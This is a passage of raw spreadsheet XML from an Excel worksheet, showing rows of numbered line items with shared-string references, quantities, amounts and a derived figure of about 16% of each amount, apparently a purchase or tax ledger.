      <c r="G1135" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1135" s="10">
        <v>150</v>
      </c>
      <c r="I1135" s="14">
        <v>2307.69</v>
      </c>
      <c r="J1135" s="15">
        <v>369.12</v>
      </c>
      <c r="K1135" s="16"/>
    </row>
    <row r="1136" spans="2:11">
      <c r="B1136" s="9">
        <v>1170</v>
      </c>
      <c r="C1136" s="238" t="s">
        <v>7715</v>
      </c>
      <c r="D1136" s="238" t="s">
        <v>7716</v>
      </c>
      <c r="E1136" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1136" s="238" t="s">
        <v>7717</v>
      </c>
      <c r="G1136" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1136" s="10">
        <v>90</v>
      </c>
      <c r="I1136" s="14">
        <v>974.74</v>
      </c>
      <c r="J1136" s="15">
        <v>155.952</v>
      </c>
      <c r="K1136" s="16"/>
    </row>
    <row r="1137" spans="2:11">
      <c r="B1137" s="9">
        <v>1171</v>
      </c>
      <c r="C1137" s="238" t="s">
        <v>7718</v>
      </c>
      <c r="D1137" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1137" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1137" s="238" t="s">
        <v>7719</v>
      </c>
      <c r="G1137" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1137" s="10">
        <v>30</v>
      </c>
      <c r="I1137" s="14">
        <v>307.62</v>
      </c>
      <c r="J1137" s="15">
        <v>49.2</v>
      </c>
      <c r="K1137" s="16"/>
    </row>
    <row r="1138" spans="2:11">
      <c r="B1138" s="9">
        <v>1172</v>
      </c>
      <c r="C1138" s="238" t="s">
        <v>7720</v>
      </c>
      <c r="D1138" s="238" t="s">
        <v>7721</v>
      </c>
      <c r="E1138" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1138" s="238" t="s">
        <v>7722</v>
      </c>
      <c r="G1138" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1138" s="10">
        <v>125</v>
      </c>
      <c r="I1138" s="14">
        <v>1097.38</v>
      </c>
      <c r="J1138" s="15">
        <v>175.6</v>
      </c>
      <c r="K1138" s="16"/>
    </row>
    <row r="1139" spans="2:11">
      <c r="B1139" s="9">
        <v>1173</v>
      </c>
      <c r="C1139" s="238" t="s">
        <v>7723</v>
      </c>
      <c r="D1139" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1139" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1139" s="238" t="s">
        <v>7724</v>
      </c>
      <c r="G1139" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1139" s="10">
        <v>100</v>
      </c>
      <c r="I1139" s="14">
        <v>769.23</v>
      </c>
      <c r="J1139" s="15">
        <v>123.04</v>
      </c>
      <c r="K1139" s="16"/>
    </row>
    <row r="1140" spans="2:11">
      <c r="B1140" s="9">
        <v>1174</v>
      </c>
      <c r="C1140" s="238" t="s">
        <v>7725</v>
      </c>
      <c r="D1140" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1140" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1140" s="238" t="s">
        <v>7726</v>
      </c>
      <c r="G1140" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1140" s="10">
        <v>185</v>
      </c>
      <c r="I1140" s="14">
        <v>1033.06</v>
      </c>
      <c r="J1140" s="15">
        <v>165.168</v>
      </c>
      <c r="K1140" s="16"/>
    </row>
    <row r="1141" spans="2:11">
      <c r="B1141" s="9">
        <v>1175</v>
      </c>
      <c r="C1141" s="238" t="s">
        <v>7727</v>
      </c>
      <c r="D1141" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1141" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1141" s="238" t="s">
        <v>7728</v>
      </c>
      <c r="G1141" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1141" s="10">
        <v>100</v>
      </c>
      <c r="I1141" s="14">
        <v>512.82</v>
      </c>
      <c r="J1141" s="15">
        <v>82.08</v>
      </c>
      <c r="K1141" s="16"/>
    </row>
    <row r="1142" spans="2:11">
      <c r="B1142" s="9">
        <v>1176</v>
      </c>
      <c r="C1142" s="238" t="s">
        <v>7729</v>
      </c>
      <c r="D1142" s="238" t="s">
        <v>7730</v>
      </c>
      <c r="E1142" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1142" s="238" t="s">
        <v>7731</v>
      </c>
      <c r="G1142" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1142" s="10">
        <v>3</v>
      </c>
      <c r="I1142" s="14">
        <v>565.94</v>
      </c>
      <c r="J1142" s="15">
        <v>90.552</v>
      </c>
      <c r="K1142" s="16"/>
    </row>
    <row r="1143" spans="2:11">
      <c r="B1143" s="9">
        <v>1177</v>
      </c>
      <c r="C1143" s="238" t="s">
        <v>7732</v>
      </c>
      <c r="D1143" s="238" t="s">
        <v>7733</v>
      </c>
      <c r="E1143" s="238" t="s">
        <v>7734</v>
      </c>
      <c r="F1143" s="238" t="s">
        <v>7735</v>
      </c>
      <c r="G1143" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1143" s="10">
        <v>51</v>
      </c>
      <c r="I1143" s="14">
        <v>444.83</v>
      </c>
      <c r="J1143" s="15">
        <v>71.1552</v>
      </c>
      <c r="K1143" s="16"/>
    </row>
    <row r="1144" spans="2:11">
      <c r="B1144" s="9">
        <v>1178</v>
      </c>
      <c r="C1144" s="238" t="s">
        <v>7736</v>
      </c>
      <c r="D1144" s="238" t="s">
        <v>7737</v>
      </c>
      <c r="E1144" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1144" s="238" t="s">
        <v>7738</v>
      </c>
      <c r="G1144" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1144" s="10">
        <v>1</v>
      </c>
      <c r="I1144" s="14">
        <v>126.57</v>
      </c>
      <c r="J1144" s="15">
        <v>20.2512</v>
      </c>
      <c r="K1144" s="16"/>
    </row>
    <row r="1145" spans="2:11">
      <c r="B1145" s="9">
        <v>1179</v>
      </c>
      <c r="C1145" s="238" t="s">
        <v>7739</v>
      </c>
      <c r="D1145" s="238" t="s">
        <v>7740</v>
      </c>
      <c r="E1145" s="238" t="s">
        <v>7741</v>
      </c>
      <c r="F1145" s="238" t="s">
        <v>7742</v>
      </c>
      <c r="G1145" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1145" s="10">
        <v>1</v>
      </c>
      <c r="I1145" s="14">
        <v>55.55</v>
      </c>
      <c r="J1145" s="15">
        <v>8.888</v>
      </c>
      <c r="K1145" s="16"/>
    </row>
    <row r="1146" spans="2:11">
      <c r="B1146" s="9">
        <v>1180</v>
      </c>
      <c r="C1146" s="238" t="s">
        <v>7743</v>
      </c>
      <c r="D1146" s="238" t="s">
        <v>7744</v>
      </c>
      <c r="E1146" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1146" s="238" t="s">
        <v>7746</v>
      </c>
      <c r="G1146" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1146" s="10">
        <v>58</v>
      </c>
      <c r="I1146" s="14">
        <v>1264.03</v>
      </c>
      <c r="J1146" s="15">
        <v>202.2112</v>
      </c>
      <c r="K1146" s="16"/>
    </row>
    <row r="1147" spans="2:11">
      <c r="B1147" s="9">
        <v>1181</v>
      </c>
      <c r="C1147" s="238" t="s">
        <v>7747</v>
      </c>
      <c r="D1147" s="238" t="s">
        <v>7748</v>
      </c>
      <c r="E1147" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F1147" s="238" t="s">
        <v>7749</v>
      </c>
      <c r="G1147" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1147" s="10">
        <v>37</v>
      </c>
      <c r="I1147" s="14">
        <v>3004.23</v>
      </c>
      <c r="J1147" s="15">
        <v>480.704</v>
      </c>
      <c r="K1147" s="16"/>
    </row>
    <row r="1148" spans="2:11">
      <c r="B1148" s="9">
        <v>1182</v>
      </c>
      <c r="C1148" s="238" t="s">
        <v>7750</v>
      </c>
      <c r="D1148" s="238" t="s">
        <v>7751</v>
      </c>
      <c r="E1148" s="238" t="s">
        <v>7752</v>
      </c>
      <c r="F1148" s="238" t="s">
        <v>7753</v>
      </c>
      <c r="G1148" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1148" s="10">
        <v>30</v>
      </c>
      <c r="I1148" s="14">
        <v>489.52</v>
      </c>
      <c r="J1148" s="15">
        <v>78.336</v>
      </c>
      <c r="K1148" s="16"/>
    </row>
    <row r="1149" spans="2:11">
      <c r="B1149" s="9">
        <v>1183</v>
      </c>
      <c r="C1149" s="238" t="s">
        <v>7754</v>
      </c>
      <c r="D1149" s="238" t="s">
        <v>7755</v>
      </c>
      <c r="E1149" s="238" t="s">
        <v>3886</v>
      </c>
      <c r="F1149" s="238" t="s">
        <v>7756</v>
      </c>
      <c r="G1149" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1149" s="10">
        <v>1</v>
      </c>
      <c r="I1149" s="14">
        <v>1709.4</v>
      </c>
      <c r="J1149" s="15">
        <v>273.504</v>
      </c>
      <c r="K1149" s="16"/>
    </row>
    <row r="1150" spans="2:11">
      <c r="B1150" s="9">
        <v>1184</v>
      </c>
      <c r="C1150" s="238" t="s">
        <v>7757</v>
      </c>
      <c r="D1150" s="238" t="s">
        <v>7758</v>
      </c>
      <c r="E1150" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F1150" s="238" t="s">
        <v>7759</v>
      </c>
      <c r="G1150" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1150" s="10">
        <v>12</v>
      </c>
      <c r="I1150" s="14">
        <v>1368</v>
      </c>
      <c r="J1150" s="15">
        <v>218.88</v>
      </c>
      <c r="K1150" s="16"/>
    </row>
    <row r="1151" spans="2:11">
      <c r="B1151" s="9">
        <v>1185</v>
      </c>
      <c r="C1151" s="238" t="s">
        <v>7760</v>
      </c>
      <c r="D1151" s="238" t="s">
        <v>7761</v>
      </c>
      <c r="E1151" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F1151" s="238" t="s">
        <v>7762</v>
      </c>
      <c r="G1151" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1151" s="10">
        <v>3</v>
      </c>
      <c r="I1151" s="14">
        <v>1278.37</v>
      </c>
      <c r="J1151" s="15">
        <v>204.5376</v>
      </c>
      <c r="K1151" s="16"/>
    </row>
    <row r="1152" spans="2:11">
      <c r="B1152" s="9">
        <v>1186</v>
      </c>
      <c r="C1152" s="238" t="s">
        <v>7763</v>
      </c>
      <c r="D1152" s="238" t="s">
        <v>7764</v>
      </c>
      <c r="E1152" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F1152" s="238" t="s">
        <v>7765</v>
      </c>
      <c r="G1152" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1152" s="10">
        <v>4</v>
      </c>
      <c r="I1152" s="14">
        <v>3884.86</v>
      </c>
      <c r="J1152" s="15">
        <v>621.5808</v>
      </c>
      <c r="K1152" s="16"/>
    </row>
    <row r="1153" spans="2:11">
      <c r="B1153" s="9">
        <v>1187</v>
      </c>
      <c r="C1153" s="238" t="s">
        <v>7766</v>
      </c>
      <c r="D1153" s="238" t="s">
        <v>7767</v>
      </c>
      <c r="E1153" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F1153" s="238" t="s">
        <v>7768</v>
      </c>
      <c r="G1153" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1153" s="10">
        <v>6</v>
      </c>
      <c r="I1153" s="14">
        <v>2338.24</v>
      </c>
      <c r="J1153" s="15">
        <v>374.1216</v>
      </c>
      <c r="K1153" s="16"/>
    </row>
    <row r="1154" spans="2:11">
      <c r="B1154" s="9">
        <v>1188</v>
      </c>
      <c r="C1154" s="238" t="s">
        <v>7769</v>
      </c>
      <c r="D1154" s="238" t="s">
        <v>7770</v>
      </c>
      <c r="E1154" s="238" t="s">
        <v>7771</v>
      </c>
      <c r="F1154" s="9"/>
      <c r="G1154" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1154" s="10">
        <v>3</v>
      </c>
      <c r="I1154" s="14">
        <v>199.2</v>
      </c>
      <c r="J1154" s="15">
        <v>31.872</v>
      </c>
      <c r="K1154" s="16"/>
    </row>
    <row r="1155" spans="2:11">
      <c r="B1155" s="9">
        <v>1189</v>
      </c>
      <c r="C1155" s="238" t="s">
        <v>7772</v>
      </c>
      <c r="D1155" s="238" t="s">
        <v>7773</v>
      </c>
      <c r="E1155" s="238" t="s">
        <v>7774</v>
      </c>
      <c r="F1155" s="9"/>
      <c r="G1155" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1155" s="10">
        <v>5</v>
      </c>
      <c r="I1155" s="14">
        <v>1048.53</v>
      </c>
      <c r="J1155" s="15">
        <v>167.768</v>
      </c>
      <c r="K1155" s="16"/>
    </row>
    <row r="1156" spans="2:11">
      <c r="B1156" s="9">
        <v>1190</v>
      </c>
      <c r="C1156" s="238" t="s">
        <v>7775</v>
      </c>
      <c r="D1156" s="238" t="s">
        <v>7776</v>
      </c>
      <c r="E1156" s="238" t="s">
        <v>7777</v>
      </c>
      <c r="F1156" s="9"/>
      <c r="G1156" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1156" s="10">
        <v>14</v>
      </c>
      <c r="I1156" s="14">
        <v>2023.07</v>
      </c>
      <c r="J1156" s="15">
        <v>323.7024</v>
      </c>
      <c r="K1156" s="16"/>
    </row>
    <row r="1157" spans="2:11">
      <c r="B1157" s="9">
        <v>1191</v>
      </c>
      <c r="C1157" s="238" t="s">
        <v>7778</v>
      </c>
      <c r="D1157" s="238" t="s">
        <v>6733</v>
      </c>
      <c r="E1157" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F1157" s="9"/>
      <c r="G1157" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1157" s="10">
        <v>2</v>
      </c>
      <c r="I1157" s="14">
        <v>175.88</v>
      </c>
      <c r="J1157" s="15">
        <v>28.1408</v>
      </c>
      <c r="K1157" s="16"/>
    </row>
    <row r="1158" spans="2:11">
      <c r="B1158" s="9">
        <v>1192</v>
      </c>
      <c r="C1158" s="238" t="s">
        <v>7779</v>
      </c>
      <c r="D1158" s="238" t="s">
        <v>7780</v>
      </c>
      <c r="E1158" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F1158" s="238" t="s">
        <v>7781</v>
      </c>
      <c r="G1158" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1158" s="10">
        <v>1</v>
      </c>
      <c r="I1158" s="14">
        <v>335.44</v>
      </c>
      <c r="J1158" s="15">
        <v>53.6704</v>
      </c>
      <c r="K1158" s="16"/>
    </row>
    <row r="1159" spans="2:11">
      <c r="B1159" s="9">
        <v>1193</v>
      </c>
      <c r="C1159" s="238" t="s">
        <v>7782</v>
      </c>
      <c r="D1159" s="238" t="s">
        <v>7783</v>
      </c>
      <c r="E1159" s="238" t="s">
        <v>5222</v>
      </c>
      <c r="F1159" s="238" t="s">
        <v>7784</v>
      </c>
      <c r="G1159" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1159" s="10">
        <v>5</v>
      </c>
      <c r="I1159" s="14">
        <v>732</v>
      </c>
      <c r="J1159" s="15">
        <v>117.12</v>
      </c>
      <c r="K1159" s="16"/>
    </row>
    <row r="1160" spans="2:11">
      <c r="B1160" s="9">
        <v>1194</v>
      </c>
      <c r="C1160" s="238" t="s">
        <v>7785</v>
      </c>
      <c r="D1160" s="238" t="s">
        <v>7786</v>
      </c>
      <c r="E1160" s="238" t="s">
        <v>5222</v>
      </c>
      <c r="F1160" s="238" t="s">
        <v>7787</v>
      </c>
      <c r="G1160" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1160" s="10">
        <v>5</v>
      </c>
      <c r="I1160" s="14">
        <v>907.2</v>
      </c>
      <c r="J1160" s="15">
        <v>145.152</v>
      </c>
      <c r="K1160" s="16"/>
    </row>
    <row r="1161" spans="2:11">
      <c r="B1161" s="9">
        <v>1195</v>
      </c>
      <c r="C1161" s="238" t="s">
        <v>7788</v>
      </c>
      <c r="D1161" s="238" t="s">
        <v>7789</v>
      </c>
      <c r="E1161" s="238" t="s">
        <v>5222</v>
      </c>
      <c r="F1161" s="238" t="s">
        <v>7790</v>
      </c>
      <c r="G1161" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1161" s="10">
        <v>18</v>
      </c>
      <c r="I1161" s="14">
        <v>2972.9</v>
      </c>
      <c r="J1161" s="15">
        <v>475.6608</v>
      </c>
      <c r="K1161" s="16"/>
    </row>
    <row r="1162" spans="2:11">
      <c r="B1162" s="9">
        <v>1196</v>
      </c>
      <c r="C1162" s="238" t="s">
        <v>7791</v>
      </c>
      <c r="D1162" s="238" t="s">
        <v>7792</v>
      </c>
      <c r="E1162" s="238" t="s">
        <v>5222</v>
      </c>
      <c r="F1162" s="238" t="s">
        <v>7793</v>
      </c>
      <c r="G1162" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1162" s="10">
        <v>5</v>
      </c>
      <c r="I1162" s="14">
        <v>904.6</v>
      </c>
      <c r="J1162" s="15">
        <v>144.736</v>
      </c>
      <c r="K1162" s="16"/>
    </row>
    <row r="1163" spans="2:11">
      <c r="B1163" s="9">
        <v>1197</v>
      </c>
      <c r="C1163" s="238" t="s">
        <v>7794</v>
      </c>
      <c r="D1163" s="238" t="s">
        <v>7795</v>
      </c>
      <c r="E1163" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1163" s="238" t="s">
        <v>7797</v>
      </c>
      <c r="G1163" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1163" s="10">
        <v>13</v>
      </c>
      <c r="I1163" s="14">
        <v>1016.8</v>
      </c>
      <c r="J1163" s="15">
        <v>162.6976</v>
      </c>
      <c r="K1163" s="16"/>
    </row>
    <row r="1164" spans="2:11">
      <c r="B1164" s="9">
        <v>1198</v>
      </c>
      <c r="C1164" s="238" t="s">
        <v>7798</v>
      </c>
      <c r="D1164" s="238" t="s">
        <v>7799</v>
      </c>
      <c r="E1164" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F1164" s="238" t="s">
        <v>7801</v>
      </c>
      <c r="G1164" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1164" s="10">
        <v>31</v>
      </c>
      <c r="I1164" s="14">
        <v>280.85</v>
      </c>
      <c r="J1164" s="15">
        <v>44.9376</v>
      </c>
      <c r="K1164" s="16"/>
    </row>
    <row r="1165" spans="2:11">
      <c r="B1165" s="9">
        <v>1199</v>
      </c>
      <c r="C1165" s="238" t="s">
        <v>7802</v>
      </c>
      <c r="D1165" s="238" t="s">
        <v>7803</v>
      </c>
      <c r="E1165" s="238" t="s">
        <v>7804</v>
      </c>
      <c r="F1165" s="238" t="s">
        <v>7805</v>
      </c>
      <c r="G1165" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1165" s="10">
        <v>3</v>
      </c>
      <c r="I1165" s="14">
        <v>1111.73</v>
      </c>
      <c r="J1165" s="15">
        <v>177.8784</v>
      </c>
      <c r="K1165" s="16"/>
    </row>
    <row r="1166" spans="2:11">
      <c r="B1166" s="9">
        <v>1200</v>
      </c>
      <c r="C1166" s="238" t="s">
        <v>7806</v>
      </c>
      <c r="D1166" s="238" t="s">
        <v>7807</v>
      </c>
      <c r="E1166" s="238" t="s">
        <v>7808</v>
      </c>
      <c r="F1166" s="238" t="s">
        <v>7809</v>
      </c>
      <c r="G1166" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1166" s="10">
        <v>12</v>
      </c>
      <c r="I1166" s="14">
        <v>148.4</v>
      </c>
      <c r="J1166" s="15">
        <v>23.7504</v>
      </c>
      <c r="K1166" s="16"/>
    </row>
    <row r="1167" spans="2:11">
      <c r="B1167" s="9">
        <v>1201</v>
      </c>
      <c r="C1167" s="238" t="s">
        <v>7810</v>
      </c>
      <c r="D1167" s="238" t="s">
        <v>7811</v>
      </c>
      <c r="E1167" s="238" t="s">
        <v>7808</v>
      </c>
      <c r="F1167" s="238" t="s">
        <v>7812</v>
      </c>
      <c r="G1167" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1167" s="10">
        <v>12</v>
      </c>
      <c r="I1167" s="14">
        <v>288.83</v>
      </c>
      <c r="J1167" s="15">
        <v>46.2144</v>
      </c>
      <c r="K1167" s="16"/>
    </row>
    <row r="1168" spans="2:11">
      <c r="B1168" s="9">
        <v>1202</v>
      </c>
      <c r="C1168" s="238" t="s">
        <v>7813</v>
      </c>
      <c r="D1168" s="238" t="s">
        <v>7814</v>
      </c>
      <c r="E1168" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F1168" s="238" t="s">
        <v>7815</v>
      </c>
      <c r="G1168" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1168" s="10">
        <v>5</v>
      </c>
      <c r="I1168" s="14">
        <v>456.12</v>
      </c>
      <c r="J1168" s="15">
        <v>72.976</v>
      </c>
      <c r="K1168" s="16"/>
    </row>
    <row r="1169" spans="2:11">
      <c r="B1169" s="9">
        <v>1203</v>
      </c>
      <c r="C1169" s="238" t="s">
        <v>7816</v>
      </c>
      <c r="D1169" s="238" t="s">
        <v>7817</v>
      </c>
      <c r="E1169" s="238" t="s">
        <v>7818</v>
      </c>
      <c r="F1169" s="238" t="s">
        <v>7819</v>
      </c>
      <c r="G1169" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1169" s="10">
        <v>2</v>
      </c>
      <c r="I1169" s="14">
        <v>81.3</v>
      </c>
      <c r="J1169" s="15">
        <v>13.008</v>
      </c>
      <c r="K1169" s="16"/>
    </row>
    <row r="1170" spans="2:11">
      <c r="B1170" s="9">
        <v>1204</v>
      </c>
      <c r="C1170" s="238" t="s">
        <v>7820</v>
      </c>
      <c r="D1170" s="238" t="s">
        <v>7821</v>
      </c>
      <c r="E1170" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F1170" s="238" t="s">
        <v>7822</v>
      </c>
      <c r="G1170" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1170" s="10">
        <v>1</v>
      </c>
      <c r="I1170" s="14">
        <v>35.2</v>
      </c>
      <c r="J1170" s="15">
        <v>5.632</v>
      </c>
      <c r="K1170" s="16"/>
    </row>
    <row r="1171" spans="2:11">
      <c r="B1171" s="9">
        <v>1205</v>
      </c>
      <c r="C1171" s="238" t="s">
        <v>7823</v>
      </c>
      <c r="D1171" s="238" t="s">
        <v>7824</v>
      </c>
      <c r="E1171" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F1171" s="238" t="s">
        <v>7826</v>
      </c>
      <c r="G1171" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1171" s="10">
        <v>6</v>
      </c>
      <c r="I1171" s="14">
        <v>293.45</v>
      </c>
      <c r="J1171" s="15">
        <v>46.9536</v>
      </c>
      <c r="K1171" s="16"/>
    </row>
    <row r="1172" spans="2:11">
      <c r="B1172" s="9">
        <v>1206</v>
      </c>
      <c r="C1172" s="238" t="s">
        <v>7827</v>
      </c>
      <c r="D1172" s="238" t="s">
        <v>7828</v>
      </c>
      <c r="E1172" s="238" t="s">
        <v>7829</v>
      </c>
      <c r="F1172" s="238" t="s">
        <v>7830</v>
      </c>
      <c r="G1172" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1172" s="10">
        <v>1</v>
      </c>
      <c r="I1172" s="14">
        <v>6625</v>
      </c>
      <c r="J1172" s="15">
        <v>1060</v>
      </c>
      <c r="K1172" s="16"/>
    </row>
    <row r="1173" spans="2:11">
      <c r="B1173" s="9">
        <v>1207</v>
      </c>
      <c r="C1173" s="238" t="s">
        <v>7831</v>
      </c>
      <c r="D1173" s="238" t="s">
        <v>7832</v>
      </c>
      <c r="E1173" s="238" t="s">
        <v>7833</v>
      </c>
      <c r="F1173" s="238" t="s">
        <v>7731</v>
      </c>
      <c r="G1173" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1173" s="10">
        <v>5</v>
      </c>
      <c r="I1173" s="14">
        <v>1972.19</v>
      </c>
      <c r="J1173" s="15">
        <v>315.552</v>
      </c>
      <c r="K1173" s="16"/>
    </row>
    <row r="1174" spans="2:11">
      <c r="B1174" s="9">
        <v>1208</v>
      </c>
      <c r="C1174" s="238" t="s">
        <v>7834</v>
      </c>
      <c r="D1174" s="238" t="s">
        <v>7835</v>
      </c>
      <c r="E1174" s="238" t="s">
        <v>3907</v>
      </c>
      <c r="F1174" s="238" t="s">
        <v>7836</v>
      </c>
      <c r="G1174" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1174" s="10">
        <v>1</v>
      </c>
      <c r="I1174" s="14">
        <v>4358.97</v>
      </c>
      <c r="J1174" s="15">
        <v>697.4352</v>
      </c>
      <c r="K1174" s="16"/>
    </row>
    <row r="1175" spans="2:11">
      <c r="B1175" s="9">
        <v>1209</v>
      </c>
      <c r="C1175" s="238" t="s">
        <v>7837</v>
      </c>
      <c r="D1175" s="238" t="s">
        <v>7838</v>
      </c>
      <c r="E1175" s="238" t="s">
        <v>7839</v>
      </c>
      <c r="F1175" s="238" t="s">
        <v>7840</v>
      </c>
      <c r="G1175" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1175" s="10">
        <v>1</v>
      </c>
      <c r="I1175" s="14">
        <v>999.92</v>
      </c>
      <c r="J1175" s="15">
        <v>159.9872</v>
      </c>
      <c r="K1175" s="16"/>
    </row>
    <row r="1176" spans="2:11">
      <c r="B1176" s="9">
        <v>1210</v>
      </c>
      <c r="C1176" s="238" t="s">
        <v>7841</v>
      </c>
      <c r="D1176" s="238" t="s">
        <v>7842</v>
      </c>
      <c r="E1176" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1176" s="238" t="s">
        <v>7843</v>
      </c>
      <c r="G1176" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1176" s="10">
        <v>12</v>
      </c>
      <c r="I1176" s="14">
        <v>1673.28</v>
      </c>
      <c r="J1176" s="15">
        <v>267.7248</v>
      </c>
      <c r="K1176" s="16"/>
    </row>
    <row r="1177" spans="2:11">
      <c r="B1177" s="9">
        <v>1211</v>
      </c>
      <c r="C1177" s="238" t="s">
        <v>7844</v>
      </c>
      <c r="D1177" s="238" t="s">
        <v>7845</v>
      </c>
      <c r="E1177" s="238" t="s">
        <v>7846</v>
      </c>
      <c r="F1177" s="238" t="s">
        <v>7847</v>
      </c>
      <c r="G1177" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1177" s="10">
        <v>1</v>
      </c>
      <c r="I1177" s="14">
        <v>4727.44</v>
      </c>
      <c r="J1177" s="15">
        <v>756.3904</v>
      </c>
      <c r="K1177" s="16"/>
    </row>
    <row r="1178" spans="2:11">
      <c r="B1178" s="9">
        <v>1212</v>
      </c>
      <c r="C1178" s="238" t="s">
        <v>7848</v>
      </c>
      <c r="D1178" s="238" t="s">
        <v>7849</v>
      </c>
      <c r="E1178" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1178" s="238" t="s">
        <v>7850</v>
      </c>
      <c r="G1178" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1178" s="10">
        <v>20</v>
      </c>
      <c r="I1178" s="14">
        <v>1011.48</v>
      </c>
      <c r="J1178" s="15">
        <v>161.824</v>
      </c>
      <c r="K1178" s="16"/>
    </row>
    <row r="1179" spans="2:11">
      <c r="B1179" s="9">
        <v>1213</v>
      </c>
      <c r="C1179" s="238" t="s">
        <v>7851</v>
      </c>
      <c r="D1179" s="238" t="s">
        <v>7852</v>
      </c>
      <c r="E1179" s="238" t="s">
        <v>7853</v>
      </c>
      <c r="F1179" s="238" t="s">
        <v>7854</v>
      </c>
      <c r="G1179" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1179" s="10">
        <v>1</v>
      </c>
      <c r="I1179" s="14">
        <v>8119.66</v>
      </c>
      <c r="J1179" s="15">
        <v>1299.1456</v>
      </c>
      <c r="K1179" s="16"/>
    </row>
    <row r="1180" spans="2:11">
      <c r="B1180" s="9">
        <v>1214</v>
      </c>
      <c r="C1180" s="238" t="s">
        <v>7855</v>
      </c>
      <c r="D1180" s="238" t="s">
        <v>7856</v>
      </c>
      <c r="E1180" s="238" t="s">
        <v>7857</v>
      </c>
      <c r="F1180" s="238" t="s">
        <v>7858</v>
      </c>
      <c r="G1180" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1180" s="10">
        <v>1</v>
      </c>
      <c r="I1180" s="14">
        <v>5982.91</v>
      </c>
      <c r="J1180" s="15">
        <v>957.2656</v>
      </c>
      <c r="K1180" s="16"/>
    </row>
    <row r="1181" spans="2:11">
      <c r="B1181" s="9">
        <v>1215</v>
      </c>
      <c r="C1181" s="238" t="s">
        <v>7859</v>
      </c>
      <c r="D1181" s="238" t="s">
        <v>7860</v>
      </c>
      <c r="E1181" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1181" s="238" t="s">
        <v>7861</v>
      </c>
      <c r="G1181" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1181" s="10">
        <v>18</v>
      </c>
      <c r="I1181" s="14">
        <v>747.83</v>
      </c>
      <c r="J1181" s="15">
        <v>119.664</v>
      </c>
      <c r="K1181" s="16"/>
    </row>
    <row r="1182" spans="2:11">
      <c r="B1182" s="9">
        <v>1216</v>
      </c>
      <c r="C1182" s="238" t="s">
        <v>7862</v>
      </c>
      <c r="D1182" s="238" t="s">
        <v>7863</v>
      </c>
      <c r="E1182" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1182" s="238" t="s">
        <v>7864</v>
      </c>
      <c r="G1182" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1182" s="10">
        <v>29</v>
      </c>
      <c r="I1182" s="14">
